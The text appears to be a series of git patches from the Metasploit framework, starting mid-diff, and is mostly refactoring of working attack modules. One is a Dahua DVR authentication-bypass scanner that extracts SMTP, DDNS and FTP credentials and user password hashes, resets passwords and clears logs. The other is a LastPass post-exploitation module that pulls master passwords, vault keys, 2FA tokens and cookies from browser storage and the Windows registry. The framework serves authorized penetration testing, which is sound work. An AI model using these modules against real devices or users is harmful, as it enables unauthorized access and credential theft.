#{ddns_domain}") + print_good(" Username: #{ddns_user}") + print_good(" Password: #{ddns_pass}") + if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 + report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) end end end @@ -158,28 +155,29 @@ class Metasploit3 < Msf::Auxiliary def grab_nas connect sock.put(NAS) - if data = sock.get_once - print_status("Nas Settings @ #{rhost}:#{rport}!:") - server = '' - port = '' - if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ - server = Regexp.last_match[1].unpack('C*').join('.') - port = Regexp.last_match[2].unpack('S') - print_status(" Nas Server #{server}") - print_status(" Nas Port: #{port}") - end - if data =~ /[\x00]{16,}(?[[:print:]]+)[\x00]{16,}(?[[:print:]]+)/ + return unless (data = sock.get_once) + print_status("Nas Settings @ #{rhost}:#{rport}!:") + server = '' + port = '' + if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ + server = Regexp.last_match[1].unpack('C*').join('.') + port = Regexp.last_match[2].unpack('S') + print_status(" Nas Server #{server}") + print_status(" Nas Port: #{port}") + end + if /[\x00]{16,}(?[[:print:]]+)[\x00]{16,}(?[[:print:]]+)/ =~ data + ftpuser.strip! + ftppass.strip! + unless ftpuser.blank? || ftppass.blank? print_good(" FTP User: #{ftpuser}") print_good(" FTP Password: #{ftppass}") - if !ftpuser.to_s.strip.length == 0 && ftppass.to_s.strip.length == 0 - report_creds( - host: server, - port: port, - user: ftpuser, - pass: ftppass, - type: "FTP", - active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil? - end + report_creds( + host: server, + port: port, + user: ftpuser, + pass: ftppass, + type: "FTP", + active: true) if !server.nil? && !port.nil? && !ftpuser.nil? && !ftppass.nil? end end end @@ -198,40 +196,40 @@ class Metasploit3 < Msf::Auxiliary def grab_users connect sock.put(USERS) - if data = sock.get_once.split('&&') - usercount = 0 - print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") - data.each do |val| - usercount += 1 - pass = "#{val[/(([\d]+)[:]([0-9A-Z]+)[:]([0-9A-Z]+))/i]}" - value = pass.split(":") - user = "#{value[1]}" - md5hash = "#{value[2]}" - print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") - # Write the dahua hash to the database - hash = "#{rhost} #{user}:$dahua$#{md5hash}" - report_hash(rhost, rport, user, hash) - # Write the vulnerability to the database - report_vuln( - host: rhost, - port: rport, - proto: 'tcp', - sname: 'dvr', - name: 'Dahua Authentication Password Hash Exposure', - info: "Obtained password hash for user #{user}: #{md5hash}", - refs: references - ) - end + return unless (response = sock.get_once) + data = response.split('&&') + usercount = 0 + print_status("Users\\Hashed Passwords\\Rights\\Description: @ #{rhost}:#{rport}!") + data.each do |val| + usercount += 1 + pass = "#{val[/(([\d]+)[:]([0-9A-Z]+)[:]([0-9A-Z]+))/i]}" + value = pass.split(":") + user = "#{value[1]}" + md5hash = "#{value[2]}" + print_status(" #{val[/(([\d]+)[:]([[:print:]]+))/]}") + # Write the dahua hash to the database + hash = "#{rhost} #{user}:$dahua$#{md5hash}" + report_hash(rhost, rport, user, hash) + # Write the vulnerability to the database + report_vuln( + host: rhost, + port: rport, + proto: 'tcp', + sname: 'dvr', + name: 'Dahua Authentication Password Hash Exposure', + info: "Obtained password hash for user #{user}: #{md5hash}", + refs: references + ) end end def grab_groups connect sock.put(GROUPS) - if data = sock.get_once.split('&&') - print_good("#{peer} -- groups:") - data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } - end + return unless (response = sock.get_once) + data = response.split('&&') + print_good("#{peer} -- groups:") + data.each { |val| print_status(" #{val[/(([\d]+)[:]([\w]+))/]}") } end def reset_user From b4ade1989a5172690bedf55319e528dbf0c72fd6 Mon Sep 17 00:00:00 2001 From: Martin Vigo Date: Fri, 4 Dec 2015 00:13:42 -0800 Subject: [PATCH 035/686] Add IE support for stored passwords --- modules/post/multi/gather/lastpass_creds.rb | 192 +++++++++++--------- 1 file changed, 109 insertions(+), 83 deletions(-) diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 96a4981498..3793f204b2 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -2,6 +2,7 @@ require 'msf/core' require 'base64' require 'sqlite3' require 'uri' +require 'rex' class Metasploit3 < Msf::Post include Msf::Post::File @@ -68,13 +69,14 @@ class Metasploit3 < Msf::Post account = user_profile['UserName'] browser_path_map = {} localstorage_path_map = {} + cookies_path_map = {} case platform when /win/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", - 'IE' => "HKEY_CURRENT_USER\\Software\\AppDataLow\\Software\\LastPass", + 'IE' => "#{user_profile['LocalAppData']}Low\\LastPass", 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0", 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\Databases\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0" } @@ -87,8 +89,9 @@ class Metasploit3 < Msf::Post } cookies_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Cookies", - 'Firefox' => "", - 'Opera' => "", + 'Firefox' => "", # It's set programmatically + 'IE' => "#{user_profile['LocalAppData']}\\Microsoft\\Windows\\INetCookies\\Low", + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Cookies", 'Safari' => "" } when /unix|linux/ @@ -122,7 +125,7 @@ class Metasploit3 < Msf::Post 'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" } cookies_path_map = { #TODO - 'Chrome' => "", + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Cookies", 'Firefox' => "", 'Opera' => "", 'Safari' => "" @@ -161,16 +164,21 @@ class Metasploit3 < Msf::Post vprint_status "Checking #{account}'s #{browser}" if browser == "IE" # Special case for IE - ## Check the Registry to see if there are any accounts. if not return empty array "paths" + root_key, base_key = session.sys.registry.splitkey('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass') + reg_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) + return [] if not reg_key + reg_value = reg_key.query_value("LoginUsers") + return [] if not reg_value + paths |= ['HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass'] if !reg_value.data.blank? && path != "Low\\LastPass" # Hacky way to detect if there is access to user's data (attacker has no root access) + reg_key.close elsif browser == "Firefox" # Special case for Firefox - profiles = firefox_profile_files(path, browser) - paths |= profiles + paths |= firefox_profile_files(path, browser) else paths |= file_paths(path, browser, account) end vprint_good "Found #{paths.size} #{browser} databases for #{account}" - paths + return paths.size > 0 ? paths.first : [] end # Returns the relevant information from user profiles @@ -242,7 +250,7 @@ class Metasploit3 < Msf::Post files = session.shell_command("ls \"#{path}\"").split else print_error "Session type not recognized: #{session.type}" - return found_dbs_paths + return [] end files.reject! { |file| %w(. ..).include?(file) } @@ -251,30 +259,50 @@ class Metasploit3 < Msf::Post end end - found_dbs_paths + [found_dbs_paths] end + + # Parses the Firefox preferences file and returns encoded credentials - def firefox_credentials(prefs_path, localstorage_db_path) + def ie_firefox_credentials(prefs_path, localstorage_db_path) credentials = [] - File.readlines(prefs_path).each do |line| - if /user_pref\("extensions.lastpass.loginusers", "(?.*)"\);/ =~ line - usernames = encoded_users.split("|") - usernames.each do |username| - credentials << [username, nil] - end - break + data = nil + + if(prefs_path == nil) # IE + root_key, base_key = session.sys.registry.splitkey('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass') + reg_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) + return [] if not reg_key + reg_value = reg_key.query_value("LoginUsers") + return [] if not reg_value + usernames = reg_value.data.split("|") + usernames.each do |username| + credentials << [username, nil] end + + # Extract master passwords + reg_value = reg_key.query_value("LoginPws") + data = Base64.encode64(reg_value.data) if reg_value + reg_key.close + else # Firefox + loot_path = loot_file(prefs_path, nil, 'firefox.preferences', "text/javascript", "Firefox preferences file") + return [] if !loot_path + File.readlines(loot_path).each do |line| + if /user_pref\("extensions.lastpass.loginusers", "(?.*)"\);/ =~ line + usernames = encoded_users.split("|") + usernames.each do |username| + credentials << [username, nil] + end + break + end + end + + # Extract master passwords + path = localstorage_db_path + client.fs.file.separator + "lp.loginpws" + data = read_remote_file(path) if client.fs.file.exists?(path) # Read file if it exists end - # Extract master passwords - path = localstorage_db_path + client.fs.file.separator + "lp.loginpws" - begin - data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists - rescue EOFError - vprint_error "File #{path} is empty" - data = nil - end + # Get encrypted master passwords data = windows_unprotect(data) if data != nil && data.match(/^AQAAA.+/) # Verify Windows protection return credentials if data.blank? # No passwords stored creds_per_user = data.split("|") @@ -311,45 +339,43 @@ class Metasploit3 < Msf::Post def extract_credentials(account_map) account_map.each_pair do |account, browser_map| - browser_map.each_pair do |browser, paths| + browser_map.each_pair do |browser, lp_data| account_map[account][browser]['lp_creds'] = {} - if browser == 'Firefox' - paths['lp_db_path'].each do |path| - loot_path = loot_file(path, nil, 'firefox.preferences', "text/javascript", "Firefox preferences file #{path}") - ffcreds = firefox_credentials(loot_path, paths['localstorage_db'] ) # Extract usernames and passwords from preference file - unless ffcreds.blank? - ffcreds.each do |creds| - if creds[1].blank? # No master password found - account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => nil} - else - sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(URI.unescape(creds[0])) - sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin - creds[1] = decrypt_data(sha256_binary_email, URI.unescape(creds[1])) - account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => creds[1]} - end + if browser.match(/Firefox|IE/) + if browser == "Firefox" + ieffcreds = ie_firefox_credentials(lp_data['lp_db_path'].first, lp_data['localstorage_db']) + else + ieffcreds = ie_firefox_credentials(nil, lp_data['localstorage_db']) + end + unless ieffcreds.blank? + ieffcreds.each do |creds| + if creds[1].blank? # No master password found + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => nil} + else + sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(URI.unescape(creds[0])) + sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin + creds[1] = decrypt_data(sha256_binary_email, URI.unescape(creds[1])) + account_map[account][browser]['lp_creds'][URI.unescape(creds[0])] = {'lp_password' => creds[1]} end end - end else # Chrome, Safari and Opera - paths['lp_db_path'].each do |path| - loot_path = loot_file(path, nil, "#{browser.downcase}.lastpass.database", "application/x-sqlite3", "#{account}'s #{browser} LastPass database #{path}") - account_map[account][browser]['lp_db_loot'] = loot_path + loot_path = loot_file(lp_data['lp_db_path'], nil, "#{browser.downcase}.lastpass.database", "application/x-sqlite3", "#{account}'s #{browser} LastPass database #{lp_data['lp_db_path']}") + account_map[account][browser]['lp_db_loot'] = loot_path - # Parsing/Querying the DB - db = SQLite3::Database.new(loot_path) - result = db.execute( - "SELECT username, password FROM LastPassSavedLogins2 " \ - "WHERE username IS NOT NULL AND username != '' " \ - ) + # Parsing/Querying the DB + db = SQLite3::Database.new(loot_path) + result = db.execute( + "SELECT username, password FROM LastPassSavedLogins2 " \ + "WHERE username IS NOT NULL AND username != '' " \ + ) - for row in result - if row[0] - sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(row[0]) - sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin - row[1].blank? ? row[1] = nil : row[1] = decrypt_data(sha256_binary_email, row[1]) # Decrypt master password - account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]} - end + for row in result + if row[0] + sha256_hex_email = OpenSSL::Digest::SHA256.hexdigest(row[0]) + sha256_binary_email = [sha256_hex_email].pack "H*" # Do hex2bin + row[1].blank? ? row[1] = nil : row[1] = decrypt_data(sha256_binary_email, row[1]) # Decrypt master password + account_map[account][browser]['lp_creds'][row[0]] = {'lp_password' => row[1]} end end end @@ -361,9 +387,9 @@ class Metasploit3 < Msf::Post def extract_2fa_tokens(account_map) account_map.each_pair do |account, browser_map| browser_map.each_pair do |browser, lp_data| - if browser == 'Firefox' + if browser.match(/Firefox|IE/) path = lp_data['localstorage_db'] + client.fs.file.separator + "lp.suid" - data = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + data = read_remote_file(path) if client.fs.file.exists?(path) #Read file if it exists data = windows_unprotect(data) if data != nil && data.size > 32 # Verify Windows protection loot_path = loot_file(nil, data, "#{browser.downcase}.lastpass.localstorage", "application/x-sqlite3", "#{account}'s #{browser} LastPass localstorage #{lp_data['localstorage_db']}") account_map[account][browser]['lp_2fa'] = data @@ -414,14 +440,14 @@ class Metasploit3 < Msf::Post else # IE iterations_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_key_ie.itr" end - iterations = read_file(iterations_path) if client.fs.file.exists?(iterations_path) # Read file if it exists + iterations = read_remote_file(iterations_path) if client.fs.file.exists?(iterations_path) # Read file if it exists iterations = nil if iterations.blank? # Verify content lp_data['lp_creds'][username]['iterations'] = iterations # Find encrypted vault vault_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.act.sxml" vault_path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_lps.sxml" if !client.fs.file.exists?(vault_path) - vault = read_file(vault_path) + vault = read_remote_file(vault_path) vault = windows_unprotect(vault) if vault != nil && vault.match(/^AQAAA.+/) # Verify Windows protection vault = vault.sub(/iterations=.*;/, "") if client.fs.file.exists?(vault_path) # Remove iterations info loot_path = loot_file(nil, vault, "#{browser.downcase}.lastpass.vault", "text/plain", "#{account}'s #{browser} LastPass vault") @@ -461,7 +487,7 @@ class Metasploit3 < Msf::Post lp_data['lp_creds'][username]['vault_key'] = derive_vault_key_from_creds(username, lp_data['lp_creds'][username]['lp_password'], user_data['iterations']) else # Get vault key decrypting the locally stored one or from the disabled OTP if !browser_checked - #decrypt_local_vault_key(account, browser_map) + ##decrypt_local_vault_key(account, browser_map) browser_checked = true end if lp_data['lp_creds'][username]['vault_key'] == nil # If no vault key was found yet, try with dOTP @@ -490,16 +516,8 @@ class Metasploit3 < Msf::Post query = nil print_error "Browser #{browser} not recognized" end + loot_path = loot_file(lp_data['cookies_db'], nil, "#{browser.downcase}.lastpass.cookies", "application/x-sqlite3", "#{account}'s #{browser} cookies DB") - data = read_file(lp_data['cookies_db']) - loot_path = store_loot( - "#{browser.downcase}.lastpass.cookies", - 'application/x-sqlite3', - session, - data, - nil, - "#{account}'s #{browser} cookies DB" - ) # Parsing/Querying the DB db = SQLite3::Database.new(loot_path) begin @@ -540,7 +558,7 @@ class Metasploit3 < Msf::Post def extract_otpbin(account, browser, username, lp_data) if browser == 'Firefox' path = lp_data['localstorage_db'] + client.fs.file.separator + OpenSSL::Digest::SHA256.hexdigest(username) + "_ff.sotp" - otpbin = read_file(path) if client.fs.file.exists?(path) #Read file if it exists + otpbin = read_remote_file(path) if client.fs.file.exists?(path) #Read file if it exists otpbin = windows_unprotect(otpbin) if otpbin != nil && otpbin.match(/^AQAAA.+/) return otpbin else # Chrome, Safari and Opera @@ -678,14 +696,7 @@ class Metasploit3 < Msf::Post unless account_map.empty? # Loot passwords print_good lastpass_vault_data_table.to_s - path = store_loot( - "lastpass.#{username}.passwords", - "text/csv", - session, - lastpass_vault_data_table.to_csv, - nil, - "LastPass Vault Passwords from #{username}" - ) + loot_file(nil, lastpass_vault_data_table.to_csv, "#{browser.downcase}.lastpass.passwords", "text/csv", "LastPass Vault Passwords from #{username}") end end end @@ -730,7 +741,9 @@ class Metasploit3 < Msf::Post # Reads a remote file and loots it def loot_file(path, data, title, type, description) - data = read_file(path) if data == nil + data = read_remote_file(path) if data == nil # If no data is passed, read remote file + return nil if data == nil + loot_path = store_loot( title, type, @@ -739,7 +752,20 @@ class Metasploit3 < Msf::Post nil, description ) - return loot_path + loot_path + end + + + # Reads a remote file and returns the data + def read_remote_file(path) + data = nil + + begin + data = read_file(path) + rescue EOFError + vprint_error "File #{path} is empty" + end + data end end From 16e4d6a727b851425b990160acd3c309b9afa63a Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Fri, 4 Dec 2015 14:08:18 -0500 Subject: [PATCH 036/686] fixedd more rubocop errors, still needs work --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 48 ++++++++----------- 1 file changed, 21 insertions(+), 27 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 3baebc1b47..32ee4755e4 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -84,20 +84,18 @@ class Metasploit3 < Msf::Auxiliary connect sock.put(VERSION) data = sock.get_once - if data =~ /[\x00]{8,}([[:print:]]+)/ - ver = Regexp.last_match[1] - print_good("#{peer} -- version: #{ver}") - end + return unless data =~ /[\x00]{8,}([[:print:]]+)/ + ver = Regexp.last_match[1] + print_good("#{peer} -- version: #{ver}") end def grab_serial connect sock.put(SN) data = sock.get_once - if data =~ /[\x00]{8,}([[:print:]]+)/ - serial = Regexp.last_match[1] - print_good("#{peer} -- serial number: #{serial}") - end + return unless data =~ /[\x00]{8,}([[:print:]]+)/ + serial = Regexp.last_match[1] + print_good("#{peer} -- serial number: #{serial}") end def grab_email @@ -112,17 +110,15 @@ class Metasploit3 < Msf::Auxiliary print_status(" Server Port: #{mailhost[1]}") unless mailhost[1].nil? print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? end - if !data[5].nil? && !data[6].nil? - print_good(" SMTP User: #{data[5]}") unless data[5].nil? - print_good(" SMTP Password: #{data[6]}") unless data[6].nil? - muser = "#{data[5]}" - mpass = "#{data[6]}" - mailserver = "#{mailhost[0]}" - mailport = "#{mailhost[1]}" - if !mailserver.to_s.strip.length == 0 && !mailport.to_s.strip.length == 0 && !muser.to_s.strip.length == 0 && !mpass.to_s.strip.length == 0 - report_email_creds(mailserver, mailport, muser, mpass) if !mailserver.nil? && !mailport.nil? && !muser.nil? && !mpass.nil? - end - end + return unless data[5].blank? && data[6].blank? + print_good(" SMTP User: #{data[5]}") + print_good(" SMTP Password: #{data[6]}") + muser = "#{data[5]}" + mpass = "#{data[6]}" + mailserver = "#{mailhost[0]}" + mailport = "#{mailhost[1]}" + return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank? + report_email_creds(mailserver, mailport, muser, mpass) end def grab_ddns @@ -146,7 +142,7 @@ class Metasploit3 < Msf::Auxiliary print_status(" Domain: #{ddns_domain}") print_good(" Username: #{ddns_user}") print_good(" Password: #{ddns_pass}") - if !ddns_server.to_s.strip.length == 0 && !ddns_port.to_s.strip.length == 0 && !ddns_user.to_s.strip.length == 0 && !ddns_pass.to_s.strip.length == 0 + unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) end end @@ -187,10 +183,9 @@ class Metasploit3 < Msf::Auxiliary sock.put(CHANNELS) data = sock.get_once.split('&&') disconnect - if data.length > 1 - print_good("#{peer} -- camera channels:") - data.each_with_index { |val, index| print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") } - end + return unless data.length > 1 + print_good("#{peer} -- camera channels:") + data.each_with_index { |val, index| print_status(" #{index + 1}:#{val[/([[:print:]]+)/]}") } end def grab_users @@ -246,9 +241,8 @@ class Metasploit3 < Msf::Auxiliary sock.put(u3) sock.get_once sock.put(u1) - if sock.get_once - print_good("#{peer} -- user #{datastore['USERNAME']}'s password reset to #{@password}") - end + return unless sock.get_once + print_good("#{peer} -- user #{datastore['USERNAME']}'s password reset to #{@password}") end def clear_logs From 6ce54f15ee93131f620ac8288ecc4c22ebf4e26c Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Fri, 4 Dec 2015 14:46:26 -0500 Subject: [PATCH 037/686] added rex table for ddns func --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 32ee4755e4..b2eef23867 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -126,6 +126,11 @@ class Metasploit3 < Msf::Auxiliary sock.put(DDNS) return unless (response = sock.get_once) data = response.split(/&&[0-1]&&/) + ddns_table = Rex::Ui::Text::Table.new({ + 'Header' => 'Dahua DDNS Settings', + 'Indent' => 1, + 'Columns' => ['DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password'] + }) data.each_with_index do |val, index| next if index == 0 val = val.split("&&") @@ -135,13 +140,8 @@ class Metasploit3 < Msf::Auxiliary ddns_domain = "#{val[3]}" ddns_user = "#{val[4]}" ddns_pass = "#{val[5]}" - print_status("DDNS Settings @ #{rhost}:#{rport}!:") - print_status(" DDNS Service: #{ddns_service}") - print_status(" DDNS Server: #{ddns_server}") - print_status(" DDNS Port: #{ddns_port}") - print_status(" Domain: #{ddns_domain}") - print_good(" Username: #{ddns_user}") - print_good(" Password: #{ddns_pass}") + ddns_table << ["#{ddns_service}", "#{ddns_server}", "#{ddns_port}","#{ddns_domain}", "#{ddns_user}", "#{ddns_pass}"] + ddns_table.print unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) end From 4e0ab9b68f10de707a5202e12770bc496b39bf14 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Fri, 4 Dec 2015 15:10:02 -0500 Subject: [PATCH 038/686] fixed ddns_creds import issue, by using rhost and commenting why it needs to be used --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index b2eef23867..590010ed55 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary ddns_table << ["#{ddns_service}", "#{ddns_server}", "#{ddns_port}","#{ddns_domain}", "#{ddns_user}", "#{ddns_pass}"] ddns_table.print unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? - report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + report_ddns_cred(rhost, ddns_port, ddns_user, ddns_pass) end end end @@ -319,9 +319,12 @@ class Metasploit3 < Msf::Auxiliary create_credential_login(login_data) end - def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + def report_ddns_cred(rhost, ddns_port, ddns_user, ddns_pass) service_data = { - address: ddns_server, + # if a system returns a domain name for ddns_server this will fail to + # input into the db because the creds api expects an inet record. This has to be set to RHOST until issue #3968 is + # sorted in msf framework. + address: rhost, port: ddns_port, service_name: 'ddns settings', protocol: 'tcp', From 385e5a9fe1bb1ddfc4a0d4c72cc5bbbba86cb4a3 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Fri, 4 Dec 2015 15:28:01 -0500 Subject: [PATCH 039/686] fixed more rubocop issues with the rex table for ddns --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 590010ed55..0a7d96ebfe 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -126,11 +126,11 @@ class Metasploit3 < Msf::Auxiliary sock.put(DDNS) return unless (response = sock.get_once) data = response.split(/&&[0-1]&&/) - ddns_table = Rex::Ui::Text::Table.new({ - 'Header' => 'Dahua DDNS Settings', - 'Indent' => 1, - 'Columns' => ['DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password'] - }) + ddns_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua DDNS Settings', + 'Indent' => 1, + 'Columns' => ['DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password'] + ) data.each_with_index do |val, index| next if index == 0 val = val.split("&&") @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary ddns_domain = "#{val[3]}" ddns_user = "#{val[4]}" ddns_pass = "#{val[5]}" - ddns_table << ["#{ddns_service}", "#{ddns_server}", "#{ddns_port}","#{ddns_domain}", "#{ddns_user}", "#{ddns_pass}"] + ddns_table << ["#{ddns_service}", "#{ddns_server}", "#{ddns_port}", "#{ddns_domain}", "#{ddns_user}", "#{ddns_pass}"] ddns_table.print unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? report_ddns_cred(rhost, ddns_port, ddns_user, ddns_pass) @@ -256,7 +256,7 @@ class Metasploit3 < Msf::Auxiliary "#{rhost}:#{rport}" end - def run_host(ip) + def run_host(_ip) begin connect sock.put(U1) From 069a50e1b806bb840b0ed95038477f508a3f9f95 Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Mon, 7 Dec 2015 09:41:46 -0500 Subject: [PATCH 040/686] Revert "fixed ddns_creds import issue, by using rhost and commenting why it needs to be used" Reverting to hopefully force a fix for issue #3968 --- modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 0a7d96ebfe..6837243ba5 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -143,7 +143,7 @@ class Metasploit3 < Msf::Auxiliary ddns_table << ["#{ddns_service}", "#{ddns_server}", "#{ddns_port}", "#{ddns_domain}", "#{ddns_user}", "#{ddns_pass}"] ddns_table.print unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? - report_ddns_cred(rhost, ddns_port, ddns_user, ddns_pass) + report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) end end end @@ -319,12 +319,9 @@ class Metasploit3 < Msf::Auxiliary create_credential_login(login_data) end - def report_ddns_cred(rhost, ddns_port, ddns_user, ddns_pass) + def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) service_data = { - # if a system returns a domain name for ddns_server this will fail to - # input into the db because the creds api expects an inet record. This has to be set to RHOST until issue #3968 is - # sorted in msf framework. - address: rhost, + address: ddns_server, port: ddns_port, service_name: 'ddns settings', protocol: 'tcp', From 3d892bd1d639819e98d172c47068b8bcafdd5f6e Mon Sep 17 00:00:00 2001 From: Tyler Bennett Date: Mon, 7 Dec 2015 10:37:36 -0500 Subject: [PATCH 041/686] added rex table for grab_email func instead of printing out values --- .../scanner/misc/dahua_dvr_auth_bypass.rb | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb index 6837243ba5..bbd508e062 100644 --- a/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb +++ b/modules/auxiliary/scanner/misc/dahua_dvr_auth_bypass.rb @@ -104,20 +104,21 @@ class Metasploit3 < Msf::Auxiliary return unless (response = sock.get_once) data = response.split('&&') return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i - print_status("Email Settings: @ #{rhost}:#{rport}!") + email_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua Email Settings', + 'Indent' => '1', + 'Columns' => ['Email Server', 'Email Port', 'Email User', 'Email Password'] + ) if mailhost = Regexp.last_match[1].split(':') - print_status(" Server: #{mailhost[0]}") unless mailhost[0].nil? - print_status(" Server Port: #{mailhost[1]}") unless mailhost[1].nil? - print_status(" Destination Email: #{data[1]}") unless mailhost[1].nil? + mailserver = "#{mailhost[0]}" + mailport = "#{mailhost[1]}" end return unless data[5].blank? && data[6].blank? - print_good(" SMTP User: #{data[5]}") - print_good(" SMTP Password: #{data[6]}") muser = "#{data[5]}" mpass = "#{data[6]}" - mailserver = "#{mailhost[0]}" - mailport = "#{mailhost[1]}" + email_table << ["#{mailserver}", "#{mailport}", "#{muser}", "#{mpass}"] return unless 